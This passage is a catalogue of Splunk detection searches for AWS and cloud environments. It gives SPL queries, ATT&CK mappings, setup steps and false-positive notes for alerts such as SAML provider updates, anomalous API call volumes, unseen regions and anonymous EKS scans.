This search provides detection of updates to SAML provider in AWS. Updates to SAML provider need to be monitored closely as they may indicate possible perimeter compromise of federated credentials, or backdoor access from another cloud provider set by attacker.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2021-01-26

Search

`cloudtrail` eventName=UpdateSAMLProvider | stats count min(_time) as firstTime max(_time) as lastTime by eventType eventName requestParameters.sAMLProviderArn userIdentity.sessionContext.sessionIssuer.arn sourceIPAddress userIdentity.accessKeyId userIdentity.principalId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`aws_saml_update_identity_provider_filter`

Associated Analytic Story


How To Implement

You must install splunk AWS add on and Splunk App for AWS. This search works with cloudtrail logs.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

Updating a SAML provider or creating a new one may not necessarily be malicious however it needs to be closely monitored.

Reference


Test Dataset


version: 1


Abnormally high number of cloud infrastructure api calls

This search will detect a spike in the number of API calls made to your cloud infrastructure environment by a user.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.004
  • Last Updated: 2020-09-07

Search

| tstats count as api_calls values(All_Changes.command) as command from datamodel=Change where All_Changes.user!=unknown All_Changes.status=success by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join user HourOfDay isWeekend [ summary cloud_excessive_api_calls_v1] | where cardinality >=16 | apply cloud_excessive_api_calls_v1 threshold=0.005 | rename "IsOutlier(api_calls)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | where api_calls > expected_upper_threshold | eval distance_from_threshold = api_calls - expected_upper_threshold | table _time, user, command, api_calls, expected_upper_threshold, distance_from_threshold | `abnormally_high_number_of_cloud_infrastructure_api_calls_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Infrastructure API Calls Per User` to create the probability density function.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Reference

Test Dataset


version: 1


Abnormally high number of cloud instances destroyed

This search finds for the number successfully destroyed cloud instances for every 4 hour block. This is split up between weekdays and the weekend. It then applies the probability densitiy model previously created and alerts on any outliers.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.004
  • Last Updated: 2020-08-21

Search

| tstats count as instances_destroyed values(All_Changes.object_id) as object_id from datamodel=Change where All_Changes.action=deleted AND All_Changes.status=success AND All_Changes.object_category=instance by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join HourOfDay isWeekend [summary cloud_excessive_instances_destroyed_v1] | where cardinality >=16 | apply cloud_excessive_instances_destroyed_v1 threshold=0.005 | rename "IsOutlier(instances_destroyed)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | eval distance_from_threshold = instances_destroyed - expected_upper_threshold | table _time, user, instances_destroyed, expected_upper_threshold, distance_from_threshold, object_id | `abnormally_high_number_of_cloud_instances_destroyed_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Instances Destroyed` to create the probability density function.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Many service accounts configured within a cloud infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user.

Reference

Test Dataset

version: 1


Abnormally high number of cloud instances launched

This search finds for the number successfully created cloud instances for every 4 hour block. This is split up between weekdays and the weekend. It then applies the probability densitiy model previously created and alerts on any outliers.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.004
  • Last Updated: 2020-08-21

Search

| tstats count as instances_launched values(All_Changes.object_id) as object_id from datamodel=Change where (All_Changes.action=created) AND All_Changes.status=success AND All_Changes.object_category=instance by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join HourOfDay isWeekend [summary cloud_excessive_instances_created_v1] | where cardinality >=16 | apply cloud_excessive_instances_created_v1 threshold=0.005 | rename "IsOutlier(instances_launched)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | eval distance_from_threshold = instances_launched - expected_upper_threshold | table _time, user, instances_launched, expected_upper_threshold, distance_from_threshold, object_id | `abnormally_high_number_of_cloud_instances_launched_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Instances Launched` to create the probability density function.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user.

Reference

Test Dataset

version: 2


Abnormally high number of cloud security group api calls

This search will detect a spike in the number of API calls made to your cloud infrastructure environment about security groups by a user.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.004
  • Last Updated: 2020-09-07

Search

| tstats count as security_group_api_calls values(All_Changes.command) as command from datamodel=Change where All_Changes.object_category=firewall AND All_Changes.status=success by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join user HourOfDay isWeekend [ summary cloud_excessive_security_group_api_calls_v1] | where cardinality >=16 | apply cloud_excessive_security_group_api_calls_v1 threshold=0.005 | rename "IsOutlier(security_group_api_calls)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | where security_group_api_calls > expected_upper_threshold | eval distance_from_threshold = security_group_api_calls - expected_upper_threshold | table _time, user, command, security_group_api_calls, expected_upper_threshold, distance_from_threshold | `abnormally_high_number_of_cloud_security_group_api_calls_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Security Group API Calls Per User` to create the probability density function model.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Reference

Test Dataset


version: 1


Amazon eks kubernetes pod scan detection

This search provides detection information on unauthenticated requests against Kubernetes' Pods API

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1526
  • Last Updated: 2020-04-15

Search

`aws_cloudwatchlogs_eks` "user.username"="system:anonymous" verb=list objectRef.resource=pods requestURI="/api/v1/pods" | rename source as cluster_name sourceIPs{} as src_ip | stats count min(_time) as firstTime max(_time) as lastTime values(responseStatus.reason) values(responseStatus.code) values(userAgent) values(verb) values(requestURI) by src_ip cluster_name user.username user.groups{} | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `amazon_eks_kubernetes_pod_scan_detection_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on forAWS (version 4.4.0 or later), then configure your AWS CloudWatch EKS Logs.Please also customize the `kubernetes_pods_aws_scan_fingerprint_detection` macro to filter out the false positives.

Required field

ATT&CK

ID Technique Tactic
T1526 Cloud Service Discovery Discovery


Kill Chain Phase

  • Reconnaissance


Known False Positives

Not all unauthenticated requests are malicious, but frequency, UA and source IPs and direct request to API provide context.

Reference

Test Dataset

version: 1


Amazon eks kubernetes cluster scan detection

This search provides information of unauthenticated requests via user agent, and authentication data against Kubernetes cluster in AWS

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1526
  • Last Updated: 2020-04-15

Search

`aws_cloudwatchlogs_eks` "user.username"="system:anonymous" userAgent!="AWS Security Scanner" | rename sourceIPs{} as src_ip | stats count min(_time) as firstTime max(_time) as lastTime values(responseStatus.reason) values(source) as cluster_name values(responseStatus.code) values(userAgent) as http_user_agent values(verb) values(requestURI) by src_ip user.username user.groups{} | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` |`amazon_eks_kubernetes_cluster_scan_detection_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudWatch EKS Logs inputs.

Required field

ATT&CK

ID Technique Tactic
T1526 Cloud Service Discovery Discovery


Kill Chain Phase

  • Reconnaissance


Known False Positives

Not all unauthenticated requests are malicious, but frequency, UA and source IPs will provide context.

Reference

Test Dataset

version: 1


Cloud api calls from previously unseen user roles

This search looks for new commands from each user role.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078
  • Last Updated: 2020-09-04

Search

| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where All_Changes.user_type=AssumedRole AND All_Changes.status=success by All_Changes.user, All_Changes.command All_Changes.object | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_api_calls_per_user_role user as user, command as command OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenUserApiCall=min(firstTimeSeen) | where isnull(firstTimeSeenUserApiCall) OR firstTimeSeenUserApiCall > relative_time(now(),"-24h@h") | table firstTime, user, object, command |`security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cloud_api_calls_from_previously_unseen_user_roles_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud API Calls Per User Role - Initial` to build the initial table of user roles, commands, and times. You must also enable the second baseline search `Previously Seen Cloud API Calls Per User Role - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `cloud_api_calls_from_previously_unseen_user_roles_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_api_calls_from_previously_unseen_user_roles_filter`

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

.

Reference

Test Dataset


version: 1


Cloud compute instance created by previously unseen user

This search looks for cloud compute instances created by users who have not created them before.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.004
  • Last Updated: 2020-08-21

Search

| tstats `security_content_summariesonly` count earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object) as dest from datamodel=Change where All_Changes.action=created by All_Changes.user All_Changes.vendor_region | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_compute_creations_by_user user as user OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenUser=min(firstTimeSeen) | where isnull(firstTimeSeenUser) OR firstTimeSeenUser > relative_time(now(), "-24h@h") | table firstTime, user, dest, count vendor_region | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_by_previously_unseen_user_filter`

Associated Analytic Story


How To Implement

You must be ingesting the appropriate cloud-infrastructure logs Run the "Previously Seen Cloud Compute Creations By User" support search to create of baseline of previously seen users.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

It's possible that a user will start to create compute instances for the first time, for any number of reasons. Verify with the user launching instances that this is the intended behavior.

Reference

Test Dataset


version: 1


Cloud compute instance created in previously unused region

This search looks at cloud-infrastructure events where an instance is created in any region within the last hour and then compares it to a lookup file of previously seen regions where instances have been created.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1535
  • Last Updated: 2020-09-02

Search

| tstats earliest(_time) as firstTime latest(_time) as lastTime values(All_Changes.object_id) as dest, count from datamodel=Change where All_Changes.action=created by All_Changes.vendor_region, All_Changes.user | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_regions vendor_region as vendor_region OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenRegion=min(firstTimeSeen) | where isnull(firstTimeSeenRegion) OR firstTimeSeenRegion > relative_time(now(), "-24h@h") | table firstTime, user, dest, count , vendor_region | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_in_previously_unused_region_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Regions - Initial` to build the initial table of images observed and times. You must also enable the second baseline search `Previously Seen Cloud Regions - Update` to keep this table up to date and to age out old data. You can also provide additional filtering for this search by customizing the `cloud_compute_instance_created_in_previously_unused_region_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's possible that a user has unknowingly started an instance in a new region. Please verify that this activity is legitimate.

Reference

Test Dataset


version: 1


Cloud compute instance created with previously unseen image

This search looks for cloud compute instances being created with previously unseen image IDs.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK:
  • Last Updated: 2018-10-12

Search

| tstats count earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id) as dest from datamodel=Change where All_Changes.action=created by All_Changes.Instance_Changes.image_id, All_Changes.user | `drop_dm_object_name("All_Changes")` | `drop_dm_object_name("Instance_Changes")` | where image_id != "unknown" | lookup previously_seen_cloud_compute_images image_id as image_id OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenImage=min(firstTimeSeen) | where isnull(firstTimeSeenImage) OR firstTimeSeenImage > relative_time(now(), "-24h@h") | table firstTime, user, image_id, count, dest | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_with_previously_unseen_image_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Compute Images - Initial` to build the initial table of images observed and times. You must also enable the second baseline search `Previously Seen Cloud Compute Images - Update` to keep this table up to date and to age out old data. You can also provide additional filtering for this search by customizing the `cloud_compute_instance_created_with_previously_unseen_image_filter` macro.

Required field

Kill Chain Phase

Known False Positives

After a new image is created, the first systems created with that image will cause this alert to fire. Verify that the image being used was created by a legitimate user.

Reference

Test Dataset


version: 1


Cloud compute instance created with previously unseen instance type

Find EC2 instances being created with previously unseen instance types.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK:
  • Last Updated: 2020-09-12

Search

| tstats earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id) as dest, count from datamodel=Change where All_Changes.action=created by All_Changes.Instance_Changes.instance_type, All_Changes.user | `drop_dm_object_name("All_Changes")` | `drop_dm_object_name("Instance_Changes")` | where instance_type != "unknown" | lookup previously_seen_cloud_compute_instance_types instance_type as instance_type OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenInstanceType=min(firstTimeSeen) | where isnull(firstTimeSeenInstanceType) OR firstTimeSeenInstanceType > relative_time(now(), "-24h@h") | table firstTime, user, dest, count, instance_type | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_with_previously_unseen_instance_type_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Compute Instance Types - Initial` to build the initial table of instance types observed and times. You must also enable the second baseline search `Previously Seen Cloud Compute Instance Types - Update` to keep this table up to date and to age out old data. You can also provide additional filtering for this search by customizing the `cloud_compute_instance_created_with_previously_unseen_instance_type_filter` macro.

Required field

Kill Chain Phase

Known False Positives

It is possible that an admin will create a new system using a new instance type that has never been used before. Verify with the creator that they intended to create the system with the new instance type.

Reference

Test Dataset


version: 1


Cloud instance modified by previously unseen user

This search looks for cloud instances being modified by users who have not previously modified them.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-29

Search

| tstats `security_content_summariesonly` count earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id) as object_id values(All_Changes.command) as command from datamodel=Change where All_Changes.action=modified All_Changes.change_type=EC2 All_Changes.status=success by All_Changes.user | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_instance_modifications_by_user user as user OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenUser=min(firstTimeSeen) | where isnull(firstTimeSeenUser) OR firstTimeSeenUser > relative_time(now(), "-24h@h") | table firstTime user command object_id count | `security_content_ctime(firstTime)` | `cloud_instance_modified_by_previously_unseen_user_filter`

Associated Analytic Story


How To Implement

This search has a dependency on other searches to create and update a baseline of users observed to be associated with this activity. The search "Previously Seen Cloud Instance Modifications By User - Update" should be enabled for this detection to properly work.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

It's possible that a new user will start to modify EC2 instances when they haven't before for any number of reasons. Verify with the user that is modifying instances that this is the intended behavior.

Reference

Test Dataset


version: 1


Cloud provisioning activity from previously unseen city

This search looks for cloud provisioning activities from previously unseen cities. Provisioning activities are defined broadly as any event that runs or creates something.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078
  • Last Updated: 2020-10-09

Search

| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.object, All_Changes.command | `drop_dm_object_name("All_Changes")` | iplocation src | where isnotnull(City) | lookup previously_seen_cloud_provisioning_activity_sources City as City OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenCity=min(firstTimeSeen) | where isnull(firstTimeSeenCity) OR firstTimeSeenCity > relative_time(now(), `previously_unseen_cloud_provisioning_activity_window`) | table firstTime, src, City, user, object, command | `cloud_provisioning_activity_from_previously_unseen_city_filter` | `security_content_ctime(firstTime)`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_city_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\

This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset


version: 1


Cloud provisioning activity from previously unseen country

This search looks for cloud provisioning activities from previously unseen countries. Provisioning activities are defined broadly as any event that runs or creates something.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078
  • Last Updated: 2020-10-09

Search

| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.object, All_Changes.command | `drop_dm_object_name("All_Changes")` | iplocation src | where isnotnull(Country) | lookup previously_seen_cloud_provisioning_activity_sources Country as Country OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenCountry=min(firstTimeSeen) | where isnull(firstTimeSeenCountry) OR firstTimeSeenCountry > relative_time(now(), "-24h@h") | table firstTime, src, Country, user, object, command | `cloud_provisioning_activity_from_previously_unseen_country_filter` | `security_content_ctime(firstTime)`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_country_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\

This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset


version: 1


Cloud provisioning activity from previously unseen ip address

This search looks for cloud provisioning activities from previously unseen IP addresses. Provisioning activities are defined broadly as any event that runs or creates something.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078
  • Last Updated: 2020-08-16

Search

| tstats earliest(_time) as firstTime, latest(_time) as lastTime, values(All_Changes.object_id) as object_id from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.command | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_provisioning_activity_sources src as src OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenSrc=min(firstTimeSeen) | where isnull(firstTimeSeenSrc) OR firstTimeSeenSrc > relative_time(now(), `previously_unseen_cloud_provisioning_activity_window`) | table firstTime, src, user, object_id, command | `cloud_provisioning_activity_from_previously_unseen_ip_address_filter` | `security_content_ctime(firstTime)`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_ip_address_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\

This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset


version: 1


Cloud provisioning activity from previously unseen region

This search looks for cloud provisioning activities from previously unseen regions. Provisioning activities are defined broadly as any event that runs or creates something.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078
  • Last Updated: 2020-08-16

Search

| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.object, All_Changes.command | `drop_dm_object_name("All_Changes")` | iplocation src | where isnotnull(Region) | lookup previously_seen_cloud_provisioning_activity_sources Region as Region OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenRegion=min(firstTimeSeen) | where isnull(firstTimeSeenRegion) OR firstTimeSeenRegion > relative_time(now(), `previously_unseen_cloud_provisioning_activity_window`) | table firstTime, src, Region, user, object, command | `cloud_provisioning_activity_from_previously_unseen_region_filter` | `security_content_ctime(firstTime)`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_region_filter` macro.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\

This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset


version: 1


Detect aws console login by new user

This search looks for CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Authentication
  • ATT&CK:
  • Last Updated: 2020-05-28

Search

| tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user | `drop_dm_object_name(Authentication)` | inputlookup append=t previously_seen_users_console_logins | stats min(firstTime) as firstTime max(lastTime) as lastTime by user | eval userStatus=if(firstTime >=relative_time(now(),"-24h@h"), "First Time Logging into AWS Console", "Previously Seen User") |where userStatus="First Time Logging into AWS Console" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_aws_console_login_by_new_user_filter`

Associated Analytic Story


How To Implement

You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines.

Required field

Kill Chain Phase

  • Actions on Objectives


Known False Positives

When a legitimate new user logins for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate.

Reference

Test Dataset


version: 1


Detect aws console login by user from new city

This search looks for CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Authentication
  • ATT&CK: T1535
  • Last Updated: 2020-10-07

Search

